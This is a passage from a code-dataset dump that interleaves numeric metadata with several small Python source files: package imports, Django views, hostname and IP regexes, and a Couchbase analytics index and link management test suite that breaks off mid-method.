| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
14398dc8ccf97a0e8e9ab64ce5e4e82761fd73be
| 140
|
py
|
Python
|
allelicimbalance/__init__.py
|
anthony-aylward/allelicimbalance
|
8d2ae5d08048e2a0358936ded00f5122f97c2586
|
[
"MIT"
] | null | null | null |
allelicimbalance/__init__.py
|
anthony-aylward/allelicimbalance
|
8d2ae5d08048e2a0358936ded00f5122f97c2586
|
[
"MIT"
] | null | null | null |
allelicimbalance/__init__.py
|
anthony-aylward/allelicimbalance
|
8d2ae5d08048e2a0358936ded00f5122f97c2586
|
[
"MIT"
] | null | null | null |
from allelicimbalance.allelicimbalance import betabinom_test
from allelicimbalance.allelicimbalance import log_posterior_allelic_fold_change
| 70
| 79
| 0.935714
| 15
| 140
| 8.4
| 0.666667
| 0.31746
| 0.571429
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 140
| 2
| 79
| 70
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
145596c508e92da21e16fd89b3d43ff6d361e87b
| 553
|
py
|
Python
|
capstone/workout_journal/frontend/views.py
|
jeffisnotahero/cs50w-final
|
bcc9e28934b66ad15ef78672b6f1a2dd01def5b8
|
[
"BSD-3-Clause"
] | null | null | null |
capstone/workout_journal/frontend/views.py
|
jeffisnotahero/cs50w-final
|
bcc9e28934b66ad15ef78672b6f1a2dd01def5b8
|
[
"BSD-3-Clause"
] | null | null | null |
capstone/workout_journal/frontend/views.py
|
jeffisnotahero/cs50w-final
|
bcc9e28934b66ad15ef78672b6f1a2dd01def5b8
|
[
"BSD-3-Clause"
] | null | null | null |
from django.shortcuts import render
def index(request):
    """Render the frontend entry template."""
    template = 'frontend/index.html'
    return render(request, template)
def detail_plan(request, workout_plan_id):
    """Render frontend/index.html with the requested workout plan id in context."""
    context = {'workout_plan_id': workout_plan_id}
    return render(request, 'frontend/index.html', context)
def begin_workout(request, workout_plan_id):
    """Render frontend/index.html with the workout plan id to start from."""
    context = {'workout_plan_id': workout_plan_id}
    return render(request, 'frontend/index.html', context)
def workout_journal(request, workout_plan_id):
    """Render frontend/index.html with the journal's workout plan id in context."""
    context = {'workout_plan_id': workout_plan_id}
    return render(request, 'frontend/index.html', context)
| 29.105263
| 51
| 0.712477
| 71
| 553
| 5.253521
| 0.239437
| 0.265416
| 0.313673
| 0.289544
| 0.772118
| 0.772118
| 0.675603
| 0.675603
| 0.675603
| 0.675603
| 0
| 0
| 0.175407
| 553
| 19
| 52
| 29.105263
| 0.817982
| 0
| 0
| 0.6
| 0
| 0
| 0.218412
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.266667
| false
| 0
| 0.066667
| 0.266667
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
147297bc665dbd17d35c96ea049f285df2397044
| 43
|
py
|
Python
|
systems/__init__.py
|
Aitocir/UnfoldingWorld
|
70606eec694f006ccd6687912bce7b75d623287e
|
[
"MIT"
] | 2
|
2019-08-30T08:26:44.000Z
|
2021-04-09T14:22:09.000Z
|
systems/__init__.py
|
Aitocir/UnfoldingWorld
|
70606eec694f006ccd6687912bce7b75d623287e
|
[
"MIT"
] | null | null | null |
systems/__init__.py
|
Aitocir/UnfoldingWorld
|
70606eec694f006ccd6687912bce7b75d623287e
|
[
"MIT"
] | null | null | null |
from . import growing
from . import mapping
| 21.5
| 21
| 0.790698
| 6
| 43
| 5.666667
| 0.666667
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 43
| 2
| 22
| 21.5
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1483f1b63ab4654eb55d746187a8ea9dadf52a0c
| 399
|
py
|
Python
|
django_saltapi/utils.py
|
holmboe/django-saltapi
|
4ca83bd55a1489198583ddd9330355c870d6559a
|
[
"Apache-2.0"
] | 7
|
2015-02-22T07:36:11.000Z
|
2019-02-24T09:02:32.000Z
|
django_saltapi/utils.py
|
holmboe/django-saltapi
|
4ca83bd55a1489198583ddd9330355c870d6559a
|
[
"Apache-2.0"
] | 1
|
2019-01-30T15:20:43.000Z
|
2019-01-30T15:20:43.000Z
|
django_saltapi/utils.py
|
holmboe/django-saltapi
|
4ca83bd55a1489198583ddd9330355c870d6559a
|
[
"Apache-2.0"
] | 9
|
2015-03-24T07:52:21.000Z
|
2019-07-25T08:37:07.000Z
|
# -*- coding: utf-8 -*-
# Regular-expression fragments for validating Salt API inputs.
# Patterns adapted from:
# http://stackoverflow.com/questions/106179/regular-expression-to-match-hostname-or-ip-address
#
# NOTE: raw strings are used so that `\.` and `\-` reach the regex engine
# verbatim; in plain strings these are invalid escape sequences that raise
# SyntaxWarning on Python >= 3.12 (and are scheduled to become errors).

# Dotted-quad IPv4 address: four octets, each 0-255.
REGEX_IPADDR = r"(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])"
# Hostname: dot-separated labels of alphanumerics and hyphens, where a
# label neither starts nor ends with a hyphen.
REGEX_HOSTNAME = r"(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])"
# Salt job id: exactly 20 decimal digits.
REGEX_JID = r"([0-9]{20})"
| 57
| 124
| 0.536341
| 94
| 399
| 2.244681
| 0.329787
| 0.085308
| 0.189573
| 0.227488
| 0.407583
| 0.407583
| 0.407583
| 0.407583
| 0.407583
| 0.407583
| 0
| 0.176
| 0.06015
| 399
| 6
| 125
| 66.5
| 0.386667
| 0.285714
| 0
| 0
| 0
| 0.666667
| 0.776596
| 0.737589
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1496186f704fc2be439f7b78c7be77b20dd1f76f
| 292
|
py
|
Python
|
att_classification/tflib/data/__init__.py
|
sageprogrammer/STGAN
|
0afa9bd687cc6b038c831ec8539f3d3dcbccc4b5
|
[
"MIT"
] | 405
|
2019-04-17T03:02:18.000Z
|
2022-03-11T06:36:00.000Z
|
att_classification/tflib/data/__init__.py
|
sageprogrammer/STGAN
|
0afa9bd687cc6b038c831ec8539f3d3dcbccc4b5
|
[
"MIT"
] | 58
|
2019-05-13T09:34:57.000Z
|
2021-12-07T08:40:58.000Z
|
att_classification/tflib/data/__init__.py
|
sageprogrammer/STGAN
|
0afa9bd687cc6b038c831ec8539f3d3dcbccc4b5
|
[
"MIT"
] | 95
|
2019-04-20T02:32:32.000Z
|
2022-03-07T03:58:24.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tflib.data.dataset import *
from tflib.data.disk_image import *
from tflib.data.memory_data import *
from tflib.data.tfrecord import *
from tflib.data.tfrecord_creator import *
| 29.2
| 41
| 0.835616
| 42
| 292
| 5.404762
| 0.357143
| 0.220264
| 0.286344
| 0.334802
| 0.237885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113014
| 292
| 9
| 42
| 32.444444
| 0.876448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.125
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2168f96511cd577871ddd4d6fb4cae465a84bab6
| 98
|
py
|
Python
|
tfscripts/compat/v1/__init__.py
|
mhuen/TFScripts
|
4ade57237efcd9ce5332532d8bcc399a06bcddf2
|
[
"MIT"
] | 13
|
2017-06-15T12:36:51.000Z
|
2019-06-27T12:43:06.000Z
|
tfscripts/compat/v1/__init__.py
|
icecube/TFScripts
|
4ade57237efcd9ce5332532d8bcc399a06bcddf2
|
[
"MIT"
] | 6
|
2017-08-10T17:48:37.000Z
|
2020-03-18T19:46:53.000Z
|
tfscripts/compat/v1/__init__.py
|
icecube/TFScripts
|
4ade57237efcd9ce5332532d8bcc399a06bcddf2
|
[
"MIT"
] | 4
|
2017-08-09T20:06:49.000Z
|
2019-06-01T06:38:57.000Z
|
from tfscripts import __version__, __description__, __url__
from tfscripts import FLOAT_PRECISION
| 32.666667
| 59
| 0.877551
| 11
| 98
| 6.636364
| 0.727273
| 0.356164
| 0.520548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 98
| 2
| 60
| 49
| 0.829545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dcf5192fe6b96ffe768594b22018f39fe0772f1c
| 39,389
|
py
|
Python
|
couchbase/tests_v3/cases/analyticsmgmt_t.py
|
couchbase/couchbase-python-client
|
99ec055835f5aef0cd07905497b3ab4bb3cbbc32
|
[
"Apache-2.0"
] | 189
|
2015-01-07T18:34:31.000Z
|
2022-03-21T17:41:56.000Z
|
couchbase/tests_v3/cases/analyticsmgmt_t.py
|
couchbase/couchbase-python-client
|
99ec055835f5aef0cd07905497b3ab4bb3cbbc32
|
[
"Apache-2.0"
] | 24
|
2015-05-19T14:00:16.000Z
|
2022-03-16T22:01:30.000Z
|
couchbase/tests_v3/cases/analyticsmgmt_t.py
|
couchbase/couchbase-python-client
|
99ec055835f5aef0cd07905497b3ab4bb3cbbc32
|
[
"Apache-2.0"
] | 60
|
2015-03-10T22:12:50.000Z
|
2022-03-07T21:57:40.000Z
|
# -*- coding:utf-8 -*-
#
# Copyright 2020, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import os
from couchbase_core import ulp
from couchbase_tests.base import CollectionTestCase, SkipTest
from couchbase.management.analytics import (CreateDataverseOptions, DropDataverseOptions, CreateDatasetOptions,
CreateAnalyticsIndexOptions, DropAnalyticsIndexOptions,
DropDatasetOptions, ConnectLinkOptions, DisconnectLinkOptions,
GetLinksAnalyticsOptions)
from couchbase.exceptions import (AnalyticsLinkExistsException, DataverseAlreadyExistsException,
DataverseNotFoundException, DatasetAlreadyExistsException, DatasetNotFoundException,
InvalidArgumentException, NotSupportedException, CompilationFailedException,
ParsingFailedException, AnalyticsLinkNotFoundException)
from couchbase.analytics import (AnalyticsDataType, AnalyticsEncryptionLevel,
AnalyticsLink, AnalyticsLinkType, AzureBlobExternalAnalyticsLink,
CouchbaseAnalyticsEncryptionSettings, CouchbaseRemoteAnalyticsLink, S3ExternalAnalyticsLink)
class AnalyticsIndexManagerTests(CollectionTestCase):
    """Integration tests for the analytics index management API
    (dataverses, datasets, indexes, connect/disconnect link, pending
    mutations).  Skipped on the mock and on clusters older than 6.0;
    relies on the `beer-sample` bucket being loaded.
    """
    def setUp(self):
        """Create the test dataverse + dataset and leave the link disconnected."""
        super(AnalyticsIndexManagerTests, self).setUp()
        self._enable_print_statements = False
        if self.is_mock:
            raise SkipTest("mock doesn't mock management apis")
        if int(self.get_cluster_version().split('.')[0]) < 6:
            raise SkipTest("no analytics in {}".format(
                self.get_cluster_version()))
        self.mgr = self.cluster.analytics_indexes()
        # 7.x supports compound (slash-separated) dataverse names; 6.x does not.
        self.dataverse_name = "test/dataverse" if int(
            self.get_cluster_version().split('.')[0]) == 7 else "test_dataverse"
        self.dataset_name = "test_breweries"
        # be sure the dataverse exists
        self.mgr.create_dataverse(
            self.dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        # now ensure our dataset in there
        self.mgr.create_dataset(self.dataset_name,
                                "beer-sample",
                                CreateDatasetOptions(dataverse_name=self.dataverse_name,
                                                     condition='`type` = "brewery"',
                                                     ignore_if_exists=True)
                                )
        # best-effort: start each test with the link disconnected
        try:
            self.mgr.disconnect_link(DisconnectLinkOptions(
                dataverse_name=self.dataverse_name))
        except BaseException:
            pass
    def tearDown(self):
        """Disconnect any link and drop the test dataverse (best-effort)."""
        super(AnalyticsIndexManagerTests, self).tearDown()
        # be sure the dataverse doesn't exist
        try:
            dataverse_name = self.mgr._scrub_dataverse_name(
                self.dataverse_name)
            self.cluster.analytics_query(
                "USE {}; DISCONNECT LINK Local;".format(dataverse_name)).metadata()
        except DataverseNotFoundException:
            pass
        try:
            self.mgr.disconnect_link(DisconnectLinkOptions(
                dataverse_name=self.dataverse_name))
        except BaseException:
            pass
        # drop can race with background analytics work, so retry
        self.try_n_times(10, 3,
                         self.mgr.drop_dataverse, self.dataverse_name,
                         DropDatasetOptions(ignore_if_not_exists=True))
    def assertRows(self, query, iterations=10, pause_time=3):
        """Fail unless `query` yields at least one row within the retry budget."""
        for _ in range(iterations):
            resp = self.cluster.analytics_query(query)
            for r in resp.rows():
                return
            time.sleep(pause_time)
        self.fail("query '{}' yielded no rows after {} attempts pausing {} sec between attempts"
                  .format(query, iterations, pause_time))
    def test_create_dataverse(self):
        """setUp created the dataverse; verify it shows up in Metadata."""
        # lets query for the existence of test-dataverse
        statement = 'SELECT * FROM Metadata.`Dataverse` WHERE DataverseName="{}";'.format(
            self.dataverse_name)
        result = self.cluster.analytics_query(statement)
        self.assertEqual(1, len(result.rows()))
    def test_create_dataverse_ignore_exists(self):
        """Duplicate create raises unless ignore_if_exists=True is passed."""
        self.assertRaises(DataverseAlreadyExistsException,
                          self.mgr.create_dataverse, self.dataverse_name)
        self.mgr.create_dataverse(
            self.dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
    def test_drop_dataverse(self):
        """Dropping the dataverse removes it from Metadata."""
        self.mgr.drop_dataverse(self.dataverse_name)
        self.mgr.connect_link()
        statement = 'SELECT * FROM Metadata.`Dataverse` WHERE DataverseName="{}";'.format(
            self.dataverse_name)
        result = self.cluster.analytics_query(statement)
        self.assertEqual(0, len(result.rows()))
    def test_drop_dataverse_ignore_not_exists(self):
        """Dropping a missing dataverse raises unless ignore_if_not_exists=True."""
        self.mgr.drop_dataverse(self.dataverse_name)
        self.assertRaises(DataverseNotFoundException,
                          self.mgr.drop_dataverse, self.dataverse_name)
        self.mgr.drop_dataverse(
            self.dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_create_dataset(self):
        """The dataset created in setUp must appear in get_all_datasets()."""
        # we put a dataset in during the setUp, so...
        datasets = self.mgr.get_all_datasets()
        for dataset in datasets:
            if self._enable_print_statements:
                print(dataset)
            if dataset.dataset_name == self.dataset_name:
                return
        self.fail("didn't find {} in listing of all datasets".format(
            self.dataset_name))
    def test_create_dataset_ignore_exists(self):
        """Duplicate dataset create raises unless ignore_if_exists=True."""
        self.assertRaises(DatasetAlreadyExistsException, self.mgr.create_dataset, self.dataset_name, 'beer-sample',
                          CreateDatasetOptions(dataverse_name=self.dataverse_name))
        self.mgr.create_dataset(self.dataset_name, 'beer-sample',
                                CreateDatasetOptions(dataverse_name=self.dataverse_name), ignore_if_exists=True)
    def test_drop_dataset(self):
        """Drop succeeds once, then raises unless ignore_if_not_exists=True."""
        self.mgr.drop_dataset(self.dataset_name, DropDatasetOptions(
            dataverse_name=self.dataverse_name))
        self.assertRaises(DatasetNotFoundException, self.mgr.drop_dataset, self.dataset_name,
                          DropDatasetOptions(dataverse_name=self.dataverse_name))
        self.mgr.drop_dataset(self.dataset_name, DropDatasetOptions(dataverse_name=self.dataverse_name,
                                                                    ignore_if_not_exists=True))
    def test_create_index(self):
        """Created index must eventually appear in get_all_indexes()."""
        self.mgr.create_index("test_brewery_idx", self.dataset_name,
                              {'name': AnalyticsDataType.STRING,
                               'description': AnalyticsDataType.STRING},
                              CreateAnalyticsIndexOptions(dataverse_name=self.dataverse_name))
        def check_for_idx(idx):
            # raises if idx is not (yet) listed; used with try_n_times below
            indexes = self.mgr.get_all_indexes()
            for index in indexes:
                if self._enable_print_statements:
                    print(index)
                if index.name == idx:
                    return
            raise Exception(
                "unable to find 'test_brewery_idx' in list of all indexes")
        self.try_n_times(10, 3, check_for_idx, 'test_brewery_idx')
    def test_drop_index(self):
        """After drop, the index must eventually disappear from the listing."""
        # create one first, if not already there
        self.mgr.create_index("test_brewery_idx", self.dataset_name,
                              {'name': AnalyticsDataType.STRING,
                               'description': AnalyticsDataType.STRING},
                              CreateAnalyticsIndexOptions(dataverse_name=self.dataverse_name))
        def check_for_idx(idx):
            # raises if idx is not listed; used both to await creation and removal
            indexes = self.mgr.get_all_indexes()
            for index in indexes:
                if self._enable_print_statements:
                    print(index)
                if index.name == idx:
                    return
            raise Exception(
                "unable to find 'test_brewery_idx' in list of all indexes")
        self.try_n_times(10, 3, check_for_idx, 'test_brewery_idx')
        self.mgr.drop_index("test_brewery_idx", self.dataset_name,
                            DropAnalyticsIndexOptions(dataverse_name=self.dataverse_name))
        self.try_n_times_till_exception(
            10, 3, check_for_idx, 'test_brewery_idx')
    def test_connect_link(self):
        """Connecting the Local link ingests documents into the dataset."""
        self.mgr.connect_link(ConnectLinkOptions(
            dataverse_name=self.dataverse_name))
        # connect link should result in documents in the dataset, so...
        dataverse_name = self.mgr._scrub_dataverse_name(self.dataverse_name)
        self.assertRows(
            'USE {}; SELECT * FROM `{}` LIMIT 1'.format(dataverse_name, self.dataset_name))
        # manually stop it for now
        # NOTE(review): the second .format() argument is unused by this
        # template (only one {} placeholder) -- harmless but misleading.
        self.cluster.analytics_query(
            'USE {}; DISCONNECT LINK Local'.format(dataverse_name, self.dataset_name)).metadata()
    def test_get_pending_mutations(self):
        """Pending-mutations map gains our dataverse key after connect_link."""
        try:
            result = self.mgr.get_pending_mutations()
            if self._enable_print_statements:
                # we expect no test_dataverse key yet
                print(result)
            self.assertFalse("test_dataverse" in result.keys())
            self.mgr.connect_link(ConnectLinkOptions(
                dataverse_name=self.dataverse_name))
            time.sleep(5)
            result = self.mgr.get_pending_mutations()
            if self._enable_print_statements:
                print(result)
            dataverse_name = self.mgr._scrub_dataverse_name(
                self.dataverse_name).replace("`", "")
            self.assertTrue(dataverse_name in result.keys())
        except NotSupportedException:
            raise SkipTest(
                "get pending mutations not supported on this cluster")
    def test_v6_dataverse_name_parsing(self):
        """On 6.x, dotted and slashed dataverse names are rejected (differently)."""
        if int(self.cluster_version.split('.')[0]) != 6:
            raise SkipTest("Test only for 6.x versions")
        # wish the analytics service was consistent here :/
        if float(self.cluster_version[:3]) >= 6.6:
            with self.assertRaises(CompilationFailedException):
                self.mgr.create_dataverse(
                    "test.beer_sample", CreateDataverseOptions(ignore_if_exists=True))
        else:
            self.mgr.create_dataverse(
                "test.beer_sample", CreateDataverseOptions(ignore_if_exists=True))
        # wish the analytics service was consistent here also :/
        with self.assertRaises(ParsingFailedException):
            # test/beer_sample => `test`.`beer_sample` which is not valid prior
            # to 7.0
            self.mgr.create_dataverse(
                "test/beer_sample", CreateDataverseOptions(ignore_if_exists=True))
    def test_v7_dataverse_name_parsing(self):
        """On 7.x, both dotted and slashed dataverse names are accepted."""
        if int(self.cluster_version.split('.')[0]) != 7:
            raise SkipTest("Test only for 7.x versions")
        # test.beer_sample => `test.beer_sample` which is valid >= 7.0
        self.mgr.create_dataverse(
            "test.beer_sample", CreateDataverseOptions(ignore_if_exists=True))
        statement = 'SELECT * FROM Metadata.`Dataverse` WHERE DataverseName="test.beer_sample";'.format(
            self.dataverse_name)
        result = self.cluster.analytics_query(statement)
        self.assertEqual(1, len(result.rows()))
        self.mgr.drop_dataverse("test.beer_sample")
        # test/beer_sample => `test`.`beer_sample` which is valid >= 7.0
        self.mgr.create_dataverse(
            "test/beer_sample", CreateDataverseOptions(ignore_if_exists=True))
        statement = 'SELECT * FROM Metadata.`Dataverse` WHERE DataverseName="test/beer_sample";'.format(
            self.dataverse_name)
        result = self.cluster.analytics_query(statement)
        self.assertEqual(1, len(result.rows()))
        self.mgr.drop_dataverse("test/beer_sample")
class AnalyticsIndexManagerLinkTests(CollectionTestCase):
    """Integration tests for the analytics *link* management API
    (create/replace/drop/get for Couchbase-remote, S3 and Azure-blob
    links).  Requires a real cluster >= 7.0 (the link management REST
    API does not exist earlier); skipped on the mock.
    """
    def setUp(self):
        """Skip unless the cluster supports link management; grab the manager."""
        super(AnalyticsIndexManagerLinkTests, self).setUp()
        if self.is_mock:
            raise SkipTest("mock doesn't mock management apis")
        if int(self.cluster_version.split('.')[0]) < 6:
            raise SkipTest("no analytics in {}".format(
                self.cluster_version))
        if int(self.cluster_version.split('.')[0]) < 7:
            raise SkipTest("No analytics link management API in {}".format(
                self.cluster_version))
        self.mgr = self.cluster.analytics_indexes()
    def test_couchbase_remote_link_encode(self):
        """form_encode() must carry hostname/type/encryption and credentials."""
        link = CouchbaseRemoteAnalyticsLink("test_dataverse",
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.NONE),
                                            username="Administrator",
                                            password="password")
        encoded = link.form_encode().decode()
        query_str = ulp.parse_qs(encoded)
        self.assertEqual("localhost", query_str.get("hostname")[0])
        self.assertEqual(AnalyticsLinkType.CouchbaseRemote.value,
                         query_str.get("type")[0])
        self.assertEqual(AnalyticsEncryptionLevel.NONE.value,
                         query_str.get("encryption")[0])
        self.assertEqual("Administrator", query_str.get("username")[0])
        self.assertEqual("password", query_str.get("password")[0])
        # FULL encryption: certificates are sent instead of username/password
        link = CouchbaseRemoteAnalyticsLink("test_dataverse",
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.FULL,
                                                certificate=bytes(
                                                    'certificate', 'utf-8'),
                                                client_certificate=bytes(
                                                    'clientcertificate', 'utf-8'),
                                                client_key=bytes('clientkey', 'utf-8')),
                                            )
        encoded = link.form_encode().decode()
        query_str = ulp.parse_qs(encoded)
        self.assertEqual("localhost", query_str.get("hostname")[0])
        self.assertEqual(AnalyticsLinkType.CouchbaseRemote.value,
                         query_str.get("type")[0])
        self.assertEqual(AnalyticsEncryptionLevel.FULL.value,
                         query_str.get("encryption")[0])
        self.assertEqual("certificate", query_str.get("certificate")[0])
        self.assertEqual("clientcertificate",
                         query_str.get("clientCertificate")[0])
        self.assertEqual("clientkey", query_str.get("clientKey")[0])
    def test_s3_external_link(self):
        """Full create/get/replace/drop round-trip for S3 links."""
        dataverse_name = "test_dataverse"
        self.mgr.create_dataverse(
            dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        link = S3ExternalAnalyticsLink(dataverse_name,
                                       "s3link",
                                       "accesskey",
                                       "us-west-2",
                                       secret_access_key="mysupersecretkey",
                                       )
        link1 = S3ExternalAnalyticsLink(dataverse_name,
                                        "s3link1",
                                        "accesskey1",
                                        "us-east-2",
                                        secret_access_key="mysupersecretkey1",
                                        )
        self.mgr.create_link(link)
        self.mgr.create_link(link1)
        links = self.mgr.get_links()
        self.assertEqual(2, len(links))
        # each returned link must match one of the two we created
        for l in links:
            link_match = (l.dataverse_name() == link.dataverse_name()
                          and l.name() == link.name()
                          and l.link_type() == AnalyticsLinkType.S3External
                          and l._region == link._region
                          and l._access_key_id == link._access_key_id)
            link1_match = (l.dataverse_name() == link1.dataverse_name()
                           and l.name() == link1.name()
                           and l.link_type() == AnalyticsLinkType.S3External
                           and l._region == link1._region
                           and l._access_key_id == link1._access_key_id)
            self.assertTrue(link_match or link1_match)
        links = self.mgr.get_links(GetLinksAnalyticsOptions(
            dataverse_name=dataverse_name, name=link.name()))
        self.assertEqual(1, len(links))
        self.assertTrue(links[0].dataverse_name() == link.dataverse_name()
                        and links[0].name() == link.name()
                        and links[0].link_type() == AnalyticsLinkType.S3External
                        and links[0]._region == link._region
                        and links[0]._access_key_id == link._access_key_id)
        # replace: same name/dataverse, new region + secret
        new_link = S3ExternalAnalyticsLink(dataverse_name,
                                           "s3link",
                                           "accesskey",
                                           "eu-west-2",
                                           secret_access_key="mysupersecretkey1",
                                           )
        self.mgr.replace_link(new_link)
        links = self.mgr.get_links()
        self.assertEqual(2, len(links))
        links = self.mgr.get_links(GetLinksAnalyticsOptions(
            dataverse_name=dataverse_name, name=new_link.name()))
        self.assertEqual(1, len(links))
        self.assertTrue(links[0].dataverse_name() == new_link.dataverse_name()
                        and links[0].name() == new_link.name()
                        and links[0].link_type() == AnalyticsLinkType.S3External
                        and links[0]._region == new_link._region
                        and links[0]._access_key_id == new_link._access_key_id)
        self.mgr.drop_link("s3link", dataverse_name)
        self.mgr.drop_link("s3link1", dataverse_name)
        links = self.mgr.get_links()
        self.assertEqual(0, len(links))
        self.mgr.drop_dataverse(
            dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_s3_external_link_compound_dataverse(self):
        """Same round-trip as test_s3_external_link, with a slash-compound dataverse."""
        dataverse_name = "test/dataverse"
        self.mgr.create_dataverse(
            dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        link = S3ExternalAnalyticsLink(dataverse_name,
                                       "s3link",
                                       "accesskey",
                                       "us-west-2",
                                       secret_access_key="mysupersecretkey",
                                       )
        link1 = S3ExternalAnalyticsLink(dataverse_name,
                                        "s3link1",
                                        "accesskey1",
                                        "us-east-2",
                                        secret_access_key="mysupersecretkey1",
                                        )
        self.mgr.create_link(link)
        self.mgr.create_link(link1)
        links = self.mgr.get_links()
        self.assertEqual(2, len(links))
        # each returned link must match one of the two we created
        for l in links:
            link_match = (l.dataverse_name() == link.dataverse_name()
                          and l.name() == link.name()
                          and l.link_type() == AnalyticsLinkType.S3External
                          and l._region == link._region
                          and l._access_key_id == link._access_key_id)
            link1_match = (l.dataverse_name() == link1.dataverse_name()
                           and l.name() == link1.name()
                           and l.link_type() == AnalyticsLinkType.S3External
                           and l._region == link1._region
                           and l._access_key_id == link1._access_key_id)
            self.assertTrue(link_match or link1_match)
        links = self.mgr.get_links(GetLinksAnalyticsOptions(
            dataverse_name=dataverse_name, name=link.name()))
        self.assertEqual(1, len(links))
        self.assertTrue(links[0].dataverse_name() == link.dataverse_name()
                        and links[0].name() == link.name()
                        and links[0].link_type() == AnalyticsLinkType.S3External
                        and links[0]._region == link._region
                        and links[0]._access_key_id == link._access_key_id)
        # replace: same name/dataverse, new region + secret
        new_link = S3ExternalAnalyticsLink(dataverse_name,
                                           "s3link",
                                           "accesskey",
                                           "eu-west-2",
                                           secret_access_key="mysupersecretkey1",
                                           )
        self.mgr.replace_link(new_link)
        links = self.mgr.get_links()
        self.assertEqual(2, len(links))
        links = self.mgr.get_links(GetLinksAnalyticsOptions(
            dataverse_name=dataverse_name, name=new_link.name()))
        self.assertEqual(1, len(links))
        self.assertTrue(links[0].dataverse_name() == new_link.dataverse_name()
                        and links[0].name() == new_link.name()
                        and links[0].link_type() == AnalyticsLinkType.S3External
                        and links[0]._region == new_link._region
                        and links[0]._access_key_id == new_link._access_key_id)
        self.mgr.drop_link("s3link", dataverse_name)
        self.mgr.drop_link("s3link1", dataverse_name)
        links = self.mgr.get_links()
        self.assertEqual(0, len(links))
        self.mgr.drop_dataverse(
            dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_create_link_fail_link_exists(self):
